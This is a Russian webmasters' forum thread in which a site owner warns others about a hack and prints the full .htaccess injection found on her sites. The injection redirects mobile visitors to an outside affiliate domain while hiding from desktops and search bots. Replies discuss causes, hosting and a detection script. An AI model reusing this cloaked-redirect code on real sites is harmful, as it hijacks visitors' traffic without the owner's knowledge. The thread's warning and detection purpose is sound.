WEBLEDI.RUВебледи Форум успешных женщин-вебмастеров
04 Декабрь 2016, 05:59:34 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Правила Реклама
 
5
10
15
Свежие ответы
Re: Готовые статьи на тему "Красота и здоровье" недорого. от Yula (Контент, копирайтинг, переводы)
Re: CPA-сеть Hotpartner.biz от kuprum (CPA-сети)
Re: Нужны копирайтеры на постоянную работу! от ZAS (Ищу копирайтера, редактора, контент-менеджера)
Re: Дизайн от новичка от LanaSvetNik (Дизайн)
Онлайн-консультант Jivosite со скидкой до 20% от KeyWebRu (Хостинг)
Создать тест-опрос в Гугл Документах (или ваш вариант) от Anonyff (Работа и услуги)
Re: AdBean - Бобовая тизерная сеть. Новостные и товарные тизеры. До 90% отчислений! от AdBean (Реклама и доход)
Re: Подарю, продам или сдам в аренду домены от June (Домены)
Автоматизация Яндекс Директ + возврат 8% от рекламного бюджета. от Александр_26 (Полезное)
Re: Quick Sender - Комбайн для продвижения в ВКонтакте от Dima_Myrzich (Социальные сети)
Re: Марафон Спарта от Пузата - Почему я иду от Katelite (Обучение сайтостроению, SEO и заработку)
Re: Чистенький женский СДЛ. Размещение в авто от uckpa (Платное размещение статей и ссылок)
Re: [Анонс] Программа для группировки ключевых слов KeyAssort от KeyAssort (Сервисы и SEO программы)
Re: Имеют ли вес покупные ссылки при теперешних правилах Яндекса от Lina7 (Раскрутка сайтов в поисковиках)
Re: Насколько необходим онлайн консультант на сайте? от fainna (Юзабилити)
Свежие темы
Показать ещё
  Печать  
Страниц: 1
Автор

Тема: Хитрый вирус на сайте для мобильных устройств  (Прочитано 3058 раз)

0 Пользователей и 1 Гость смотрят эту тему.
Oksana
Offline Offline

Пол: Женский
Сообщений: 1796



Просмотр профиля
« : 02 Январь 2012, 16:02:50 »

Прочитав тему http://webledi.ru/forum/index.php?topic=9707.0
Решила тоже создать свою, чтобы поделиться и предостеречь...

Вчера со своего новенького планшетника вышла на 1 свой сайт и попала совсем на другой, подорвавшись побежала к ноуту. Открываю - все ок. Полезла в htaccess и вижу:
Код:
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !ipad [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !iPad [NC]
RewriteCond %{HTTP_USER_AGENT} !iPhone [NC]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://wapvo.ru/?a=0344s274z4y2x4t2w4v2t2t2y3s2x444w2y274y2f4t2641364 [L,R=302][/quote]

И так на всех сайтах.

То есть настроен редирект на левый сайт, если чел выходит с телефона, планшетки, КПК и пр.

Возможно этот редирект стоял год, а то и больше  Грустный

Проверьте свои сайты.

Мой хостинг - бегет, сервер нави.
Записан

для развлекательных сайтов.
Проверено экспериментально: лучшая тизерка для женских сайтов .
TheGP
Offline Offline

Сообщений: 3


Просмотр профиля
« Ответ #1 : 07 Январь 2012, 18:15:39 »

Не вычислили как поломали? Пару минут назад засек это на своем сайте.. возможно получится забанить акк этого партнера в той партнерке...

На каком движке сайт?

P.S. редирект наврятли долго стоял, я в течении дня его вычислил, судя по всему сейчас идет бум на мобильный трафик, яндекс уже помогает отслеживать эти переадресации и отправляет письмо, но мне не успело придти)
« Последнее редактирование: 07 Январь 2012, 18:21:04 от TheGP » Записан
Oksana
Offline Offline

Пол: Женский
Сообщений: 1796



Просмотр профиля
« Ответ #2 : 07 Январь 2012, 18:18:04 »

Не вычислили как поломали? Пару минут назад засек это на своем сайте.. возможно получится забанить акк этого партнера в той партнерке...

На каком движке сайт?
Нет, не получилось  Грустный , сайтов много - 18. Почти все на разных движках, хостер писал, что возможно, посмотрят.
Записан

для развлекательных сайтов.
Проверено экспериментально: лучшая тизерка для женских сайтов .
TheGP
Offline Offline

Сообщений: 3


Просмотр профиля
« Ответ #3 : 07 Январь 2012, 18:20:31 »

Вордпресс среди них есть? у меня такая же проблема(хотя меньше 10) + еще логи можно почистить))

Ладно, я короче на досуге напишу скриптик проверяющий на это внедрение, потом скину если нужен.

Кстати если есть свободное время - можно попробовать подать на них в милицию. Та ссылка - это партнерская ссылка. На том сайте есть кое какие данные, типа кошелька и мыла, так что с чего начать расследование есть, если они были не аккуратны - могут и вычислить их.
« Последнее редактирование: 07 Январь 2012, 18:38:06 от TheGP » Записан
Oksana
Offline Offline

Пол: Женский
Сообщений: 1796



Просмотр профиля
« Ответ #4 : 08 Январь 2012, 02:59:12 »

Вордпресс среди них есть? у меня такая же проблема(хотя меньше 10) + еще логи можно почистить))
Да, есть.

Ладно, я короче на досуге напишу скриптик проверяющий на это внедрение, потом скину если нужен.
Можно. Надеюсь чистый ))

Кстати если есть свободное время - можно попробовать подать на них в милицию. Та ссылка - это партнерская ссылка. На том сайте есть кое какие данные, типа кошелька и мыла, так что с чего начать расследование есть, если они были не аккуратны - могут и вычислить их.
Мне кажется, на всех в милицию не наподаешься, да и результат сомнительный - милиции на такие дела начхать  В замешательстве
Записан

для развлекательных сайтов.
Проверено экспериментально: лучшая тизерка для женских сайтов .
TheGP
Offline Offline

Сообщений: 3


Просмотр профиля
« Ответ #5 : 09 Февраль 2012, 02:21:30 »

Можно. Надеюсь чистый ))
Нет, конечно же я добавил свой вирус для захвата вселенной;)

Давайте попробуем. Вот первая версия:
Достаете из архива php файл. Открываете с помощью PSPad, Notepad++ или в крайнем случае блокнотом.
Там все инструкции.

Для теста добавьте в файл htaccess который в скрипте зададите, строчку
#RewriteCond %{HTTP_USER_AGENT} !windows-media-player
в любое место (она закомментирована и не работает) И откройте данный файл в браузере. И если письмо не приходит, то проверьте папку спам и вытащите его оттуда(имя отправителя: HtaccessDefender). Кроме того скрипт сразу должен вывести сообщение что один из файлов заражен.

P.S. уже обновил скрипт и добавил версию, в версии 0.01 дописаны инструкции и исправлена работособность под кроном
« Последнее редактирование: 09 Февраль 2012, 06:12:43 от TheGP » Записан
melnik27
Offline Offline

Сообщений: 2


Просмотр профиля
« Ответ #6 : 06 Август 2012, 12:34:16 »

Обратитесь в , вам сделают комплексную проверку всех файлов вашего сайта на наличие вредоносного кода и удалят его. Также вам сделают защиту от заражения вирусами, устранив уязвимости сервера.
Записан
Kimin
Offline Offline

Сообщений: 306


Просмотр профиля WWW
« Ответ #7 : 07 Август 2012, 07:08:30 »

Уж сколько раз твердили миру... Дешевый хост=дорогое лечение.
Записан

GoodShadow
Offline Offline

Пол: Женский
Сообщений: 460


Мур мур :3


Просмотр профиля
« Ответ #8 : 09 Август 2012, 05:51:15 »

Ух сколько тут с бегетом мучаются  Рот на замке

Уж сколько раз твердили миру... Дешевый хост=дорогое лечение.

Ага, но даже дорогой не всегда надёжный Улыбка)
Записан

skype: goodsh_love
Angel-A
Offline Offline

Сообщений: 34


Master of Social Networking


Просмотр профиля
« Ответ #9 : 20 Август 2012, 16:05:49 »

Уж сколько раз твердили миру... Дешевый хост=дорогое лечение.

Тут дело скорее всего не в хосте, а в каком-нибудь открытом движке типа вордпресс и других, в которых куча уязвимостей.
Записан
Mazajka
Всё-равно свой сайт не брошу. потому что он ХОРОШИЙ!
Offline Offline

Пол: Женский
Сообщений: 7411


Уже и аватарку нельзя поставить, какую хочу...


Просмотр профиля
« Ответ #10 : 20 Август 2012, 19:54:45 »

Тут дело скорее всего не в хосте, а в каком-нибудь открытом движке типа вордпресс и других, в которых куча уязвимостей.
чаще дело именно в хосте.
Записан


Oksana
Offline Offline

Пол: Женский
Сообщений: 1796



Просмотр профиля
« Ответ #11 : 21 Август 2012, 20:28:29 »

У меня такое ощущение, что Бегет, у меня 2 акка там, и еще 4 других хостинга. Оба акка на бегет ломают постоянно, другие - ни-ни.  В замешательстве
Записан

для развлекательных сайтов.
Проверено экспериментально: лучшая тизерка для женских сайтов .
Страниц: 1
  Печать  
 
Перейти в:  

| Sitemap